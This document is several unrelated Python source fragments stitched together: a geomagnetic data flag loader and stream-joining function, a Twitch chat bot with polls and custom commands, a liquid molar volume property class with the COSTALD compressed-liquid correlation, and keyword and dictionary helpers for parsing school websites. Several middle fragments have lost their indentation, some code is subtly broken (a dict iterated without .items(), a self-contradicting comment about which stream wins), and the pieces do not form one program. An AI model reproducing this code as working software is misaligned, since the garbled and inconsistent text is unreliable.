        try:
            import json
            print("Reading a json style flaglist...")

            def dateparser(dct):
                # Convert dates in dictionary to datetime objects
                for (key, value) in dct.items():
                    for i, line in enumerate(value):
                        for j, elem in enumerate(line):
                            # Heuristic: 'YYYY-MM-DD HH:MM:SS[.ffffff]' contains
                            # exactly two '-' and two ':'.
                            if str(elem).count('-') + str(elem).count(':') == 4:
                                try:
                                    try:
                                        value[i][j] = datetime.strptime(elem, "%Y-%m-%d %H:%M:%S.%f")
                                    except ValueError:
                                        value[i][j] = datetime.strptime(elem, "%Y-%m-%d %H:%M:%S")
                                except (ValueError, TypeError):
                                    # not a parsable date - leave it untouched
                                    pass
                    dct[key] = value
                return dct

            if not os.path.isfile(path):
                print("Flagfile not yet existing ...")
                return []
            with open(path, 'r') as fh:
                mydic = json.load(fh, object_hook=dateparser)
            # Re-insert the sensorid column (dropped on save) at position 5.
            if sensorid:
                # Previously the fallback was '' which leaked a str where a
                # list is expected; [] keeps the return type consistent.
                mylist = mydic.get(sensorid, [])
                for el in mylist:
                    el.insert(5, sensorid)
            else:
                mylist = []
                for s in mydic:
                    for el in mydic[s]:
                        el.insert(5, s)
                    mylist.extend(mydic[s])
            if begin:
                mylist = [el for el in mylist if el[1] > begin]
            if end:
                mylist = [el for el in mylist if el[0] < end]
            return mylist
        except Exception:
            return []
    else:
        try:
            from pickle import load as pklload
            # Close the handle deterministically (was pklload(open(...))).
            with open(path, "rb") as fh:
                mylist = pklload(fh)
            print("loadflags: list {a} successfully loaded, found {b} inputs".format(a=path, b=len(mylist)))
            if sensorid:
                print(" - extracting data for sensor {}".format(sensorid))
                mylist = [el for el in mylist if el[5] == sensorid]
            if begin:
                mylist = [el for el in mylist if el[1] > begin]
            if end:
                mylist = [el for el in mylist if el[0] < end]
            #print(" -> remaining flags: {b}".format(b=len(mylist)))
            return mylist
        except Exception:
            return []
def joinStreams(stream_a,stream_b, **kwargs):
    """
    DEFINITION:
        Copy two streams together eventually replacing already existing time steps.
        Data of stream_a will replace data of stream_b.
        Both streams are converted to ndarray form if necessary; missing
        columns on either side are padded (NaN for numeric keys, '-' for
        string keys) so that all columns keep a consistent length.

    PARAMETERS:
        - stream_a: (DataStream) stream whose data wins on duplicate times
        - stream_b: (DataStream) stream to be joined underneath

    RETURNS:
        - (DataStream) combined, de-duplicated and time-sorted stream

    APPLICATION
        combinedstream = joinStreams(stream_a,stream_b)
    """
    logger.info('joinStreams: Start joining at %s.' % str(datetime.now()))

    # Check stream type and eventually convert them to ndarrays
    # --------------------------------------
    ndtype = False
    if len(stream_a.ndarray[0]) > 0:
        # Using ndarray and eventually convert stream_b to ndarray as well
        ndtype = True
        if not len(stream_b.ndarray[0]) > 0:
            stream_b = stream_b.linestruct2ndarray()
            if not len(stream_b.ndarray[0]) > 0:
                return stream_a
    elif len(stream_b.ndarray[0]) > 0:
        ndtype = True
        stream_a = stream_a.linestruct2ndarray()
        if not len(stream_a.ndarray[0]) > 0:
            return stream_b
    else:
        ndtype = True
        stream_a = stream_a.linestruct2ndarray()
        stream_b = stream_b.linestruct2ndarray()
        if not len(stream_a.ndarray[0]) > 0 and not len(stream_b.ndarray[0]) > 0:
            # Fixed log message: this is joinStreams, not subtractStreams
            logger.error('joinStreams: stream(s) empty - aborting join.')
            return stream_a

    # non-destructive
    # --------------------------------------
    sa = stream_a.copy()
    sb = stream_b.copy()

    # Get indicies of timesteps of stream_b of which identical times are existing in stream_a-> delelte those lines
    # --------------------------------------
    # IMPORTANT: If two streams with different keys should be combined then "merge" is the method of choice
    # NEW: shape problems when removing data -> now use removeduplicates at the end
    # SHOULD WORK (already tested) as remove duplicate will keep the last value and drop earlier occurences
    #indofb = np.nonzero(np.in1d(sb.ndarray[0], sa.ndarray[0]))[0]
    #for idx,elem in enumerate(sb.ndarray):
    #    if len(sb.ndarray[idx]) > 0:
    #        sb.ndarray[idx] = np.delete(sb.ndarray[idx],indofb)

    # Now add stream_a to stream_b - regard for eventually missing column data
    # --------------------------------------
    array = [[] for key in KEYLIST]
    for idx,elem in enumerate(sb.ndarray):
        if len(sa.ndarray[idx]) > 0 and len(sb.ndarray[idx]) > 0:
            array[idx] = np.concatenate((sa.ndarray[idx],sb.ndarray[idx]))
        elif not len(sa.ndarray[idx]) > 0 and len(sb.ndarray[idx]) > 0:
            # column only present in b: pad a's side with NaN / '-'
            if idx < len(NUMKEYLIST):
                fill = float('nan')
            else:
                fill = '-'
            arraya = np.asarray([fill]*len(sa.ndarray[0]))
            array[idx] = np.concatenate((arraya,sb.ndarray[idx]))
        elif len(sa.ndarray[idx]) > 0 and not len(sb.ndarray[idx]) > 0:
            # column only present in a: pad b's side with NaN / '-'
            if idx < len(NUMKEYLIST):
                fill = float('nan')
            else:
                fill = '-'
            arrayb = np.asarray([fill]*len(sb.ndarray[0]))
            array[idx] = np.concatenate((sa.ndarray[idx],arrayb))
        else:
            array[idx] = np.asarray([])

    stream = DataStream([LineStruct()],sa.header,np.asarray(array,dtype=object))
    # removeduplicates keeps the LAST occurrence, so stream_b data (appended
    # after stream_a) replaces... no: stream_a comes first, b second -- the
    # kept-last rule is what makes later entries win on identical timestamps.
    stream = stream.removeduplicates()

    return stream.sorting()
def appendStreams(streamlist):
"""
DESCRIPTION:
Appends contents of streamlist and returns a single new stream.
Duplicates are | |
= {
"reviewed": 1 if c_msg["sender"] == self.channel else 0,
"text": text,
}
cookies = {"session": self.session}
success = requests.post(url, data=data, cookies=cookies)
try:
success.raise_for_status()
reviewed = "to the database" if c_msg["sender"] == self.channel else "for review"
response = "Your {} has been added {}.".format(text_type, reviewed)
except Exception:
traceback.print_exc(limit=2)
response = "I had problems adding this to the database."
self.twitch_send_message(response, "!add" + text_type)
def text_retrieve(self, text_type):
#Pull a random pun/quote from the database
#Will not pull the same one twice in a row
text_type_plural = text_type + 's'
url = "https://leagueofnewbs.com/api/users/{}/{}?limit=2".format(self.channel, text_type_plural)
text_lines = self.api_caller(url)
if text_lines:
try:
if text_lines[text_type_plural][0]["text"] != self.last_text[text_type]:
response = text_lines[text_type_plural][0]["text"]
else:
try:
response = text_lines[text_type_plural][1]["text"]
except IndexError:
response = text_lines[text_type_plural][0]["text"]
except IndexError:
response = "Please insert {} into the database before using this command.".format(text_type_plural)
else:
response = "There was a problem retrieving {}.".format(text_type_plural)
self.twitch_send_message(response, '!' + text_type)
self.last_text[text_type] = response
def srl_race_retrieve(self):
#Goes through all races, finds the race the user is in, gathers all other users in the race, prints the game, the
#category people are racing, the time racebot has, and either a multitwitch link or a SRL race room link
srl_nick = self.config_data["srl_nick"]
url = 'http://api.speedrunslive.com/races'
data_decode = self.api_caller(url)
if data_decode == False:
return
data_races = data_decode['races']
srl_race_entrants = []
for i in data_races:
if self.channel in [x["twitch"].lower() for x in i["entrants"].values()] or srl_nick in [x.lower() for x in i["entrants"]]:
race_channel = i
for k, v in race_channel["entrants"].iteritems():
if srl_nick == k.lower() or self.channel == v["twitch"].lower():
user_nick = k
for values in race_channel['entrants'].values():
if values['statetext'] == 'Ready' or values['statetext'] == 'Entered':
if values['twitch'] != '':
srl_race_entrants.append(values['twitch'].lower())
user_place = race_channel['entrants'][user_nick]['place']
user_time = race_channel['entrants'][user_nick]['time']
srl_race_status = race_channel['statetext']
srl_race_time = race_channel['time']
srl_race_link = 'http://www.speedrunslive.com/race/?id={}'.format(race_channel['id'])
srl_live_entrants = []
live_decoded = self.api_caller('https://api.twitch.tv/kraken/streams?channel=' + ','.join(srl_race_entrants))
for j in live_decoded['streams']:
srl_live_entrants.append(j['channel']['name'])
response = 'Game: {}, Category: {}, Status: {}'.format(race_channel['game']['name'], race_channel['goal'], srl_race_status)
if srl_race_time > 0:
if user_time > 0:
time_formatted = self.format_sr_time(user_time)
position_suffix = str(self.get_number_suffix(user_place))
response += ', Finished {}{} with a time of {}'.format(user_place, position_suffix, time_formatted)
else:
real_time = (int(time.time()) - srl_race_time)
time_formatted = self.format_sr_time(real_time)
response += ', RaceBot Time: {}'.format(time_formatted)
live_length = len(srl_live_entrants)
if srl_race_status == 'Complete':
response += '. {}'.format(srl_race_link)
elif live_length <= 6 and live_length > 1:
multitwitch_link = "http://kadgar.net/live/" + '/'.join(srl_live_entrants)
response += '. {}'.format(multitwitch_link)
else:
response += '. {}'.format(srl_race_link)
self.twitch_send_message(response, '!race')
return
def youtube_video_check(self, c_msg):
#Links the title and uploader of the youtube video in chat
video_ids = re.findall("(?:youtube(?:-nocookie)?\.com\/(?:[^\/\n\s]+\/\S+\/|(?:v|e(?:mbed)?)\/|\S*?[?&]v=)|youtu\.be\/)([a-zA-Z0-9_-]{11})", c_msg["message"])
if not video_ids:
return
else:
seen_ids = set()
seen_add = seen_ids.add
video_ids = [x for x in video_ids if not (x in seen_ids or seen_add(x))]
final_list = []
for i in video_ids:
url = 'https://www.googleapis.com/youtube/v3/videos?part=snippet,statistics,contentDetails&id={}&key={}'.format(i, youtube_api_key)
data_decode = self.api_caller(url)
if data_decode == False:
return
if len(data_decode['items']) != 0:
data_items = data_decode['items']
video_title = data_items[0]['snippet']['title'].encode("utf-8")
uploader = data_items[0]['snippet']['channelTitle'].encode("utf-8")
view_count = data_items[0]['statistics']['viewCount']
duration = isodate.parse_duration(data_items[0]["contentDetails"]["duration"])
duration_string = self.format_sr_time(duration.seconds)
final_list.append("[{}] {} uploaded by {}. Views: {}".format(duration_string, video_title, uploader, view_count))
else:
continue
self.twitch_send_message(" | ".join(final_list))
return
def create_vote(self, c_msg):
#Used to create polls in chat
#Creating polls requires a pretty specific syntax, but makes it easy to have different types
if self.votes:
self.twitch_send_message('There is already an open poll, please close it first.')
return
poll_type = c_msg["message"].split(' ')[1]
try:
poll = re.findall('"(.+)"', c_msg["message"])[0]
except Exception:
self.twitch_send_message('Please give the poll a name.')
return
self.votes = { 'name' : poll,
'type' : poll_type,
'options' : {},
'voters' : {}}
if poll_type == 'strict':
options = re.findall('\((.+?)\)', c_msg["message"])
if not options:
self.twitch_send_message('You did not supply any options, poll will be closed.')
self.votes.clear()
return
for i in options:
vote_option = i.lower()
self.votes['options'][vote_option] = 0
response = 'You may now vote for this poll using only the supplied options.'
elif poll_type == 'loose':
response = 'You may now vote for this poll with whatever choice you like.'
else:
response = "Please specify a poll type."
self.votes.clear()
self.twitch_send_message(response)
def end_vote(self):
#Ending a current poll will display the winning vote of the poll and close it
if self.votes:
try:
winning_amount = max(self.votes['options'].values())
winning_keys = [key for key, value in self.votes["options"] if value == winning_amount]
if len(winning_keys) == 0:
response = ""
elif len(winning_keys) == 1:
response = "{0} has won with {1} votes.".format(winning_keys[0], winning_amount)
else:
combined_keys = ", ".join(winning_keys)
response = "{0} have all tied with {1} votes!".format(combined_keys, winning_amount)
finally:
self.votes.clear()
if response:
self.twitch_send_message(response)
def vote(self, c_msg):
#Allows viewers to vote in a poll created by mods/broadcaster
try:
sender_bet = c_msg["message"].split('vote ')[-1]
sender_bet = sender_bet.lower()
except Exception:
return
if not self.votes:
return
if self.votes['type'] == 'strict':
if sender_bet not in self.votes['options']:
self.twitch_send_message('You must vote for one of the options specified: ' + ', '.join(self.votes['options'].keys()), '!vote')
return
if c_msg["sender"] in self.votes['voters']:
if sender_bet == self.votes['voters'][c_msg["sender"]]:
response = 'You have already voted for that {}.'.format(c_msg["sender"])
else:
previous = self.votes['voters'][c_msg["sender"]]
self.votes['options'][previous] -= 1
if self.votes['options'][previous] == 0 and self.votes['type'] == 'loose':
del self.votes['options'][previous]
try:
self.votes['options'][sender_bet] += 1
except KeyError:
self.votes['options'][sender_bet] = 1
self.votes['voters'][c_msg["sender"]] = sender_bet
response = '{} has changed their vote to {}'.format(c_msg["sender"], sender_bet)
else:
try:
self.votes['options'][sender_bet] += 1
except KeyError:
self.votes['options'][sender_bet] = 1
self.votes['voters'][c_msg["sender"]] = sender_bet
response = '{} now has {} votes for it.'.format(sender_bet, str(self.votes['options'][sender_bet]))
self.twitch_send_message(response, '!vote')
def check_votes(self):
#Allows you to see what is currently winning in the current poll w/o closing it
if not self.votes:
return
response = 'Current poll: "{}". '.format(self.votes["name"])
if not self.votes['options']:
response += "No one has bet yet. "
else:
for k, v in self.votes["options"].items():
response += "{}: {}; ".format(k, v)
self.twitch_send_message(response[:-2], '!vote')
def lister(self, c_msg, s_list):
#Add user to blacklist or remove them from it
#Blacklist will cause bot to completely ignore the blacklisted user
user = c_msg["message"].split(' ')[-1]
worked = False
if s_list == 'black':
self.blacklist.append(user)
with open('blacklists/{}_blacklist.txt'.format(self.channel), 'a+') as data_file:
data_file.write(user + '\n')
worked = True
elif s_list == 'white':
if user in self.blacklist:
self.blacklist.remove(user)
with open('blacklists/{}_blacklist.txt'.format(self.channel), 'w') as data_file:
try:
data_file.write(self.blacklist)
except Exception:
pass
worked = True
if worked == True:
self.twitch_send_message('{} has been {}listed'.format(user, s_list))
def add_custom_command(self, c_msg):
user = c_msg["sender"]
msg_split = c_msg["message"].split(" ", 4)
trigger = msg_split[1]
limit = msg_split[2]
admin_bool = 1 if (msg_split[3].lower() == "true" or msg_split[3].lower() == "t") else 0
output = msg_split[4]
send_data = {
"on": 1,
"trigger": trigger,
"limit": limit,
"admin": admin_bool,
"output": output
}
url = "https://leagueofnewbs.com/api/users/{}/custom_commands".format(user)
cookies = {"session": self.session}
try:
success = requests.post(url, data=send_data, cookies=cookies)
success.raise_for_status()
response = "Command successfully created."
self.custom_commands.append("!{}".format(trigger))
self.custom_command_times["!{}".format(trigger)] = {"last": 0, "limit": limit, "output": output, "admin": admin_bool}
except Exception:
traceback.print_exc(limit=2)
response = "I had problems adding this to the database."
self.twitch_send_message(response)
def del_custom_command(self, c_msg):
user = c_msg["sender"]
msg_split = c_msg["message"].split(" ")
command = msg_split[1]
if command == "":
self.twitch_send_message("Please specify a custom command to delete: {}".format(", ".join(self.custom_commands)))
return
url = "https://leagueofnewbs.com/api/users/{}/custom_commands/{}".format(user, command)
cookies = {"session": self.session}
try:
success = requests.delete(url, cookies=cookies)
success.raise_for_status()
response = "Command successfully deleted."
self.custom_commands.remove("!{}".format(command))
del self.custom_command_times["!{}".format(command)]
except Exception:
traceback.print_exc(limit=2)
response = "I could not delete the command, please make sure you supply the trigger w/o the prefix (ie: '!') and it is a command currently in the database."
self.twitch_send_message(response)
    def custom_command(self, c_msg):
        # Dispatch a channel-specific custom command stored in the database.
        # NOTE(review): for multi-word messages `param` is taken at index
        # -space_count, i.e. the SECOND word of the message, not the last one
        # -- presumably intended for "!cmd <param> ..." usage; confirm.
        space_count = c_msg["message"].count(' ')
        if space_count == 0:
            command = c_msg["message"]
            param = ''
        else:
            command = c_msg["message"].split(' ')[0]
            param = c_msg["message"].split(' ')[-space_count]
        command = '!' + command
        if command not in self.custom_commands:
            return
        # Broadcaster bypasses the admin-only restriction; other senders must
        # be of an elevated user type when the command is flagged admin-only.
        if c_msg["sender"] == self.channel:
            pass
        elif self.custom_command_times[command]["admin"] and c_msg["tags"]["user-type"] not in self.elevated_user:
            return
        # Fill template placeholders, send, and record the last-use timestamp
        # (used elsewhere for rate limiting).
        response = self.custom_command_times[command]["output"]
        response = response.replace("$sender", c_msg["sender"])
        response = response.replace("$param", param)
        self.twitch_send_message(response)
        self.custom_command_times[command]["last"] = int(time.time())
def lol_masteries(self):
#Pull the summoners active mastery page and adds up what trees they are in
summoner_name = self.config_data['general']['summoner_name']
name_url = 'https://na.api.pvp.net/api/lol/na/v1.4/summoner/by-name/{}?api_key={}'.format(summoner_name, lol_api_key)
name_data = self.api_caller(name_url)
if name_data == False:
return
summoner_id = name_data[summoner_name]['id']
mastery_url = 'https://na.api.pvp.net/api/lol/na/v1.4/summoner/{}/masteries?api_key={}'.format(summoner_id, lol_api_key)
mastery_data = self.api_caller(mastery_url)
if mastery_data == False:
return
for i in mastery_data[str(summoner_id)]['pages']:
if i['current'] == True:
active_set = i
break
masteries_used = {'offense' : 0, 'defense': 0, 'utility' : 0}
for i in active_set['masteries']:
if str(i['id'])[1] == '1':
masteries_used['offense'] += | |
Tmins.append(0); Tmaxs.append(self.Tc)
if all((self.Tc, self.Vc, self.omega)):
methods.append(TOWNSEND_HALES)
methods.append(HTCOSTALD)
methods.append(MMSNM0)
if self.CASRN in SNM0_data.index:
methods.append(MMSNM0FIT)
self.SNM0_delta_SRK = float(SNM0_data.at[self.CASRN, 'delta_SRK'])
Tmins.append(0); Tmaxs.append(self.Tc)
if all((self.Tc, self.Vc, self.omega, self.Tb, self.MW)):
methods.append(CAMPBELL_THODOS)
Tmins.append(0); Tmaxs.append(self.Tc)
if all((self.Tc, self.Pc, self.omega)):
methods_P.append(COSTALD_COMPRESSED)
if self.eos:
methods_P.append(EOS)
if Tmins and Tmaxs:
self.Tmin, self.Tmax = min(Tmins), max(Tmaxs)
self.all_methods = set(methods)
self.all_methods_P = set(methods_P)
def calculate(self, T, method):
r'''Method to calculate low-pressure liquid molar volume at tempearture
`T` with a given method.
This method has no exception handling; see `T_dependent_property`
for that.
Parameters
----------
T : float
Temperature at which to calculate molar volume, [K]
method : str
Name of the method to use
Returns
-------
Vm : float
Molar volume of the liquid at T and a low pressure, [m^3/mol]
'''
if method == RACKETT:
Vm = Rackett(T, self.Tc, self.Pc, self.Zc)
elif method == YAMADA_GUNN:
Vm = Yamada_Gunn(T, self.Tc, self.Pc, self.omega)
elif method == BHIRUD_NORMAL:
Vm = Bhirud_normal(T, self.Tc, self.Pc, self.omega)
elif method == TOWNSEND_HALES:
Vm = Townsend_Hales(T, self.Tc, self.Vc, self.omega)
elif method == HTCOSTALD:
Vm = COSTALD(T, self.Tc, self.Vc, self.omega)
elif method == YEN_WOODS_SAT:
Vm = Yen_Woods_saturation(T, self.Tc, self.Vc, self.Zc)
elif method == MMSNM0:
Vm = SNM0(T, self.Tc, self.Vc, self.omega)
elif method == MMSNM0FIT:
Vm = SNM0(T, self.Tc, self.Vc, self.omega, self.SNM0_delta_SRK)
elif method == CAMPBELL_THODOS:
Vm = Campbell_Thodos(T, self.Tb, self.Tc, self.Pc, self.MW, self.dipole)
elif method == HTCOSTALDFIT:
Vm = COSTALD(T, self.Tc, self.COSTALD_Vchar, self.COSTALD_omega_SRK)
elif method == RACKETTFIT:
Vm = Rackett(T, self.Tc, self.Pc, self.RACKETT_Z_RA)
elif method == PERRYDIPPR:
A, B, C, D = self.DIPPR_coeffs
Vm = 1./EQ105(T, A, B, C, D)
elif method == CRC_INORG_L:
rho = CRC_inorganic(T, self.CRC_INORG_L_rho, self.CRC_INORG_L_k, self.CRC_INORG_L_Tm)
Vm = rho_to_Vm(rho, self.CRC_INORG_L_MW)
# elif method == VDI_PPDS:
# A, B, C, D = self.VDI_PPDS_coeffs
# tau = 1. - T/self.VDI_PPDS_Tc
# rho = self.VDI_PPDS_rhoc + A*tau**0.35 + B*tau**(2/3.) + C*tau + D*tau**(4/3.)
# Vm = rho_to_Vm(rho, self.VDI_PPDS_MW)
elif method == CRC_INORG_L_CONST:
Vm = self.CRC_INORG_L_CONST_Vm
elif method == COOLPROP:
Vm = 1./CoolProp_T_dependent_property(T, self.CASRN, 'DMOLAR', 'l')
elif method in self.tabular_data:
Vm = self.interpolate(T, method)
return Vm
def calculate_P(self, T, P, method):
r'''Method to calculate pressure-dependent liquid molar volume at
temperature `T` and pressure `P` with a given method.
This method has no exception handling; see `TP_dependent_property`
for that.
Parameters
----------
T : float
Temperature at which to calculate molar volume, [K]
P : float
Pressure at which to calculate molar volume, [K]
method : str
Name of the method to use
Returns
-------
Vm : float
Molar volume of the liquid at T and P, [m^3/mol]
'''
if method == COSTALD_COMPRESSED:
Vm = self.T_dependent_property(T)
Psat = self.Psat(T) if hasattr(self.Psat, '__call__') else self.Psat
Vm = COSTALD_compressed(T, P, Psat, self.Tc, self.Pc, self.omega, Vm)
elif method == COOLPROP:
Vm = 1./PropsSI('DMOLAR', 'T', T, 'P', P, self.CASRN)
elif method == EOS:
self.eos[0] = self.eos[0].to_TP(T=T, P=P)
Vm = self.eos[0].V_l
elif method in self.tabular_data:
Vm = self.interpolate_P(T, P, method)
return Vm
def test_method_validity(self, T, method):
r'''Method to check the validity of a method. Follows the given
ranges for all coefficient-based methods. For CSP methods, the models
are considered valid from 0 K to the critical point. For tabular data,
extrapolation outside of the range is used if
:obj:`tabular_extrapolation_permitted` is set; if it is, the extrapolation
is considered valid for all temperatures.
It is not guaranteed that a method will work or give an accurate
prediction simply because this method considers the method valid.
**BHIRUD_NORMAL** behaves poorly at low temperatures and is not used
under 0.35Tc. The constant value available for inorganic chemicals,
from method **CRC_INORG_L_CONST**, is considered valid for all
temperatures.
Parameters
----------
T : float
Temperature at which to test the method, [K]
method : str
Name of the method to test
Returns
-------
validity : bool
Whether or not a method is valid
'''
validity = True
if method == PERRYDIPPR:
if T < self.DIPPR_Tmin or T > self.DIPPR_Tmax:
validity = False
elif method == VDI_PPDS:
validity = T <= self.VDI_PPDS_Tc
elif method == CRC_INORG_L:
if T < self.CRC_INORG_L_Tm or T > self.CRC_INORG_L_Tmax:
validity = False
elif method == COOLPROP:
if T < self.CP_f.Tmin or T < self.CP_f.Tt or T > self.CP_f.Tc:
return False
elif method in [RACKETT, YAMADA_GUNN, TOWNSEND_HALES,
HTCOSTALD, YEN_WOODS_SAT, MMSNM0, MMSNM0FIT,
CAMPBELL_THODOS, HTCOSTALDFIT, RACKETTFIT]:
if T >= self.Tc:
validity = False
elif method == BHIRUD_NORMAL:
if T/self.Tc < 0.35:
validity = False
# Has bad interpolation behavior lower than roughly this
elif method == CRC_INORG_L_CONST:
pass # Weird range, consider valid for all conditions
elif method in self.tabular_data:
# if tabular_extrapolation_permitted, good to go without checking
if not self.tabular_extrapolation_permitted:
Ts, properties = self.tabular_data[method]
if T < Ts[0] or T > Ts[-1]:
validity = False
else:
raise Exception('Method not valid')
return validity
def test_method_validity_P(self, T, P, method):
r'''Method to check the validity of a high-pressure method. For
**COOLPROP**, the fluid must be both a liquid and under the maximum
pressure of the fluid's EOS. **COSTALD_COMPRESSED** is considered
valid for all values of temperature and pressure. However, it very
often will not actually work, due to the form of the polynomial in
terms of Tr, the result of which is raised to a negative power.
For tabular data, extrapolation outside of the range is used if
:obj:`tabular_extrapolation_permitted` is set; if it is, the
extrapolation is considered valid for all temperatures and pressures.
It is not guaranteed that a method will work or give an accurate
prediction simply because this method considers the method valid.
Parameters
----------
T : float
Temperature at which to test the method, [K]
P : float
Pressure at which to test the method, [Pa]
method : str
Name of the method to test
Returns
-------
validity : bool
Whether or not a method is valid
'''
validity = True
if method == COSTALD_COMPRESSED:
pass
elif method == COOLPROP:
validity = PhaseSI('T', T, 'P', P, self.CASRN) == 'liquid'
elif method == EOS:
self.eos[0] = self.eos[0].to_TP(T=T, P=P)
validity = hasattr(self.eos[0], 'V_l')
elif method in self.tabular_data:
if not self.tabular_extrapolation_permitted:
Ts, Ps, properties = self.tabular_data[method]
if T < Ts[0] or T > Ts[-1] or P < Ps[0] or P > Ps[-1]:
validity = False
else:
raise Exception('Method not valid')
return validity
def COSTALD_compressed(T, P, Psat, Tc, Pc, omega, Vs):
r'''Calculates compressed-liquid volume, using the COSTALD [1]_ CSP
method and a chemical's critical properties.
The molar volume of a liquid is given by:
.. math::
V = V_s\left( 1 - C \ln \frac{B + P}{B + P^{sat}}\right)
\frac{B}{P_c} = -1 + a\tau^{1/3} + b\tau^{2/3} + d\tau + e\tau^{4/3}
e = \exp(f + g\omega_{SRK} + h \omega_{SRK}^2)
C = j + k \omega_{SRK}
Parameters
----------
T : float
Temperature of fluid [K]
P : float
Pressure of fluid [Pa]
Psat : float
Saturation pressure of the fluid [Pa]
Tc : float
Critical temperature of fluid [K]
Pc : float
Critical pressure of fluid [Pa]
omega : float
(ideally SRK) Acentric factor for fluid, [-]
This parameter is alternatively a fit parameter.
Vs : float
Saturation liquid volume, [m^3/mol]
Returns
-------
V_dense : float
High-pressure liquid volume, [m^3/mol]
Notes
-----
Original equation was in terms of density, but it is converted here.
The example is from DIPPR, and exactly correct.
This is DIPPR Procedure 4C: Method for Estimating the Density of Pure
Organic Liquids under Pressure.
Examples
--------
>>> COSTALD_compressed(303., 9.8E7, 85857.9, 466.7, 3640000.0, 0.281, 0.000105047)
9.287482879788506e-05
References
----------
.. [1] <NAME>., <NAME>, and <NAME>. "An Improved
Correlation for Densities of Compressed Liquids and Liquid Mixtures."
AIChE Journal 28, no. 4 (July 1, 1982): 671-76. doi:10.1002/aic.690280420
'''
a = -9.070217
b = 62.45326
d = -135.1102
f = 4.79594
g = 0.250047
h = 1.14188
j = 0.0861488
k = 0.0344483
tau = 1 - T/Tc
e = exp(f + g*omega + h*omega**2)
C = j + k*omega
B = Pc*(-1 + a*tau**(1/3.) + b*tau**(2/3.) + d*tau + e*tau**(4/3.))
return Vs*(1 - C*log((B + P)/(B + | |
open(file,'r') as infile:
var = json.load(infile)
if file.lower().endswith(".pickle"):
with open(file,'rb') as infile:
var = pickle.load(infile)
print(file + " successfully loaded!")
return var
def load_dict(custom_dict, file_path):
    """Read dictionary terms from file_path, stem each line, and add it to
    custom_dict (a set, or anything with .add), returning the result.
    Passing an already-populated collection builds combined dictionaries!"""
    with open(file_path) as file_handler:
        for raw_line in file_handler:
            # Stem each entry and strip its trailing newline before adding
            custom_dict.add(stemmer.stem(raw_line.replace("\n", "")))
    return custom_dict
def list_files(folder_path, extension):
    """Return every file under folder_path (searched recursively) whose name
    ends with the given extension.

    The extension is coerced to str and prefixed with '.' when missing.  With
    a falsy extension ('' or None) all files are returned.

    Bug fixed: the no-extension branch referenced `filename` without a loop of
    its own, raising NameError (or appending a stale name left over from a
    previous directory); it now iterates `filenames` itself.
    """
    matches = []
    if extension:
        extension = str(extension)  # Coerce to string, just in case
    if extension and not extension.startswith("."):
        extension = "." + extension
    for dirpath, dirnames, filenames in os.walk(folder_path):
        if extension:
            # Use the extension to filter this directory's files
            for filename in fnmatch.filter(filenames, "*" + extension):
                matches.append(os.path.join(dirpath, filename))
        else:
            # No extension given: take every file
            for filename in filenames:
                matches.append(os.path.join(dirpath, filename))
    return matches
def has_html(folder_path):
    """Return True if folder_path (searched recursively) contains at least one
    .html file, False otherwise."""
    for dirpath, dirnames, filenames in os.walk(folder_path):
        # fnmatch.filter returns the matching names; any hit means HTML exists
        if fnmatch.filter(filenames, "*.html"):
            return True
    return False
def convert_df(df):
    """Return a memory-slimmed copy of the DataFrame `df`.

    Object (string) columns in which at least half of the values are
    duplicates are stored as the `category` dtype, which represents repeated
    strings by small integers instead of distinct Python objects; columns that
    are mostly unique are copied as-is, since the category overhead would
    outweigh the gain.  Float and integer columns are downcast to the smallest
    sufficient subtype.

    Bug fixed: the float/int downcasts called ``.apply(...)`` and discarded
    the result, so numeric columns were never actually shrunk; the downcast
    frames are now assigned back.
    """
    converted_df = pd.DataFrame()  # memory-efficient copy built column by column
    # TO DO: Infer dtypes of df
    df_obj = df.select_dtypes(include=['object']).copy()  # object-dtype columns only
    for col in df.columns:
        if col in df_obj:
            num_unique_values = len(df_obj[col].unique())
            num_total_values = len(df_obj[col])
            # Only convert when at least half of the values are duplicates
            # (guard against division by zero on empty frames)
            if num_total_values and (num_unique_values / num_total_values) < 0.5:
                converted_df[col] = df[col].astype('category')
            else:
                converted_df[col] = df[col]
        else:
            converted_df[col] = df[col]
    float_cols = converted_df.select_dtypes(include=['float']).columns
    if len(float_cols):
        converted_df[float_cols] = converted_df[float_cols].apply(pd.to_numeric, downcast='float')
    int_cols = converted_df.select_dtypes(include=['int']).columns
    if len(int_cols):
        converted_df[int_cols] = converted_df[int_cols].apply(pd.to_numeric, downcast='signed')
    return converted_df
# ### Set parsing keywords
keywords = ['values', 'academics', 'skills', 'purpose',
'direction', 'mission', 'vision', 'vision', 'mission', 'our purpose',
'our ideals', 'ideals', 'our cause', 'curriculum','curricular',
'method', 'pedagogy', 'pedagogical', 'approach', 'model', 'system',
'structure','philosophy', 'philosophical', 'beliefs', 'believe',
'principles', 'creed', 'credo', 'values','moral', 'history', 'our story',
'the story', 'school story', 'background', 'founding', 'founded',
'established','establishment', 'our school began', 'we began',
'doors opened', 'school opened', 'about us', 'our school', 'who we are',
'our identity', 'profile', 'highlights']
mission_keywords = ['mission','vision', 'vision:', 'mission:', 'our purpose', 'our ideals', 'ideals:', 'our cause', 'cause:', 'goals', 'objective']
curriculum_keywords = ['curriculum', 'curricular', 'program', 'method', 'pedagogy', 'pedagogical', 'approach', 'model', 'system', 'structure']
philosophy_keywords = ['philosophy', 'philosophical', 'beliefs', 'believe', 'principles', 'creed', 'credo', 'value', 'moral']
history_keywords = ['history', 'story','our story', 'the story', 'school story', 'background', 'founding', 'founded', 'established', 'establishment', 'our school began', 'we began', 'doors opened', 'school opened']
about_keywords = ['about us', 'our school', 'who we are', 'overview', 'general information', 'our identity', 'profile', 'highlights']
mission_keywords = set(stemmer.stem(word) for word in mission_keywords)
curriculum_keywords = set(stemmer.stem(word) for word in curriculum_keywords)
philosophy_keywords = set(stemmer.stem(word) for word in philosophy_keywords)
history_keywords = set(stemmer.stem(word) for word in history_keywords)
about_keywords = set(stemmer.stem(word) for word in about_keywords)
all_keywords = set(stemmer.stem(key) for key in keywords)
logging.info("List of keywords:\n" + str(list(all_keywords)))
# ### Create dictionaries for each ideology and one for combined ideologies
ess_dict, prog_dict, rit_dict, all_ideol, all_dicts = set(), set(), set(), set(), set()
all_ideol = load_dict(all_ideol, dicts_dir + "ess_dict.txt")
all_ideol = load_dict(all_ideol, dicts_dir + "prog_dict.txt") # For complete ideological list, append second ideological dict
all_dicts = load_dict(all_ideol, dicts_dir + "rit_dict.txt") # For complete dict list, append ritual dict terms too
ess_dict = load_dict(ess_dict, dicts_dir + "ess_dict.txt")
prog_dict = load_dict(prog_dict, dicts_dir + "prog_dict.txt")
